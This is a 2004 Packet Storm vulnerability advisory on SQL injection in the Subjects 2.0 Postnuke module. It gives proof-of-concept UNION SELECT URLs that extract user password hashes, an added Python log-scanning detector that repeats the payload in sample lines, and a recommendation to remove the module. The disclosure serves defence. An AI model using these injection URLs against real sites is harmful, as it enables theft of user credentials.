subjects2.txt

2004-09-10T00:00:00
ID PACKETSTORM:34323
Type packetstorm
Reporter criolabs.net
Modified 2004-09-10T00:00:00

Description

****************************************************************************************************  
CRIOLABS  
  
  
- Software: Subjects 2.0   
- Type: Postnuke module  
- Vendor: Postnuke Modules Factory.  
  
  
  
****************************************************************************************************  
  
  
  
## Software ##  
  
Software: Subjects Postnuke module  
Version: 2.0  
Platforms: Unix/Win/PHP/MySQL/Postnuke  
Web: http://home.postnuke.ru  
  
  
## Vendor Description ##  
  
The module is designed for structured storage and display of text content, with the option of storing  
the content in a file on disk. Probably the best one for converting an existing HTML-based site  
to PostNuke.  
  
  
  
## Vulnerabilities ##  
  
SQL injection in the pageid, subid and catid variables.  
  
  
  
## Sql-Injection ##  
  
  
The variables listed above are vulnerable to SQL injection.  
These SQL injection vulnerabilities allow a remote user to inject arbitrary SQL commands.  
  
/index.php?module=subjects&func=listpages&subid=[SQL]  
/index.php?module=subjects&func=viewpage&pageid=[SQL]  
/index.php?module=subjects&func=listcat&catid=[SQL]  
  
  
## Proof of Concept ##  
  
  
URLs that retrieve the MD5 password hash of a user. This PoC requires UNION support in MySQL to retrieve  
the hash.  
  
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uname='yourname'/*  
  
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*  
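Because all three affected parameters (pageid, subid, catid) are numeric IDs, a site operator can spot probes like the ones above by flagging any request to the subjects module where one of them is not a plain integer. The following detector is an added example, not part of the advisory or of the module; it assumes Apache/NCSA combined-format access logs, and the log lines it scans are constructed for illustration.

```python
"""Flag requests to the Postnuke Subjects module whose integer ID parameters carry non-numeric values."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The parameters named in the advisory; each is a row ID and must be a plain integer.
INT_PARAMS = ("pageid", "subid", "catid")

# Minimal NCSA/Apache common-log parser (assumed log format, not something the module produces).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def suspicious_params(path):
    """Return {param: decoded value} for a subjects-module request whose ID params are not integers."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if query.get("module") != ["subjects"]:
        return {}  # only the vulnerable module is in scope here
    hits = {}
    for name in INT_PARAMS:
        for raw in query.get(name, []):
            # parse_qs already decoded one layer; a second unquote catches double-encoded payloads
            value = unquote(raw)
            if not re.fullmatch(r"[0-9]+", value):
                hits[name] = value
    return hits


def scan_log(lines):
    """Return a list of (client ip, parameter, decoded value) for every suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than abort the scan
        for name, value in suspicious_params(m.group("path")).items():
            findings.append((m.group("ip"), name, value))
    return findings


# Constructed sample log: two legitimate requests, the advisory's PoC URL, a quote probe, and an
# out-of-scope module that must not be reported.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Sep/2004:10:00:01 +0000] "GET /index.php?module=subjects&func=listcat&catid=3 HTTP/1.1" 200 4120',
    '198.51.100.7 - - [10/Sep/2004:10:00:02 +0000] "GET /index.php?module=subjects&func=viewpage&pageid=12 HTTP/1.1" 200 2210',
    '203.0.113.9 - - [10/Sep/2004:10:01:13 +0000] "GET /index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/* HTTP/1.1" 200 3980',
    '203.0.113.9 - - [10/Sep/2004:10:01:20 +0000] "GET /index.php?module=subjects&func=listpages&subid=5%27 HTTP/1.1" 500 611',
    '203.0.113.9 - - [10/Sep/2004:10:02:00 +0000] "GET /index.php?module=news&func=view&sid=1%20UNION HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, param, value in scan_log(SAMPLE_LOG):
        print(f"{ip}: non-numeric {param} = {value!r}")
```

The same integer check applied server-side (rejecting or casting the parameter before it reaches the query) is the fix the module itself lacks.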
  
  
  
## History ##  
  
  
Vendor contacted but no response.  
  
  
  
## Solution ##  
  
  
There is no fix available at this time; we recommend removing this module immediately.  
  
  
  
## Credits ##  
  
  
Criolabs staff  
http://www.criolabs.net   
  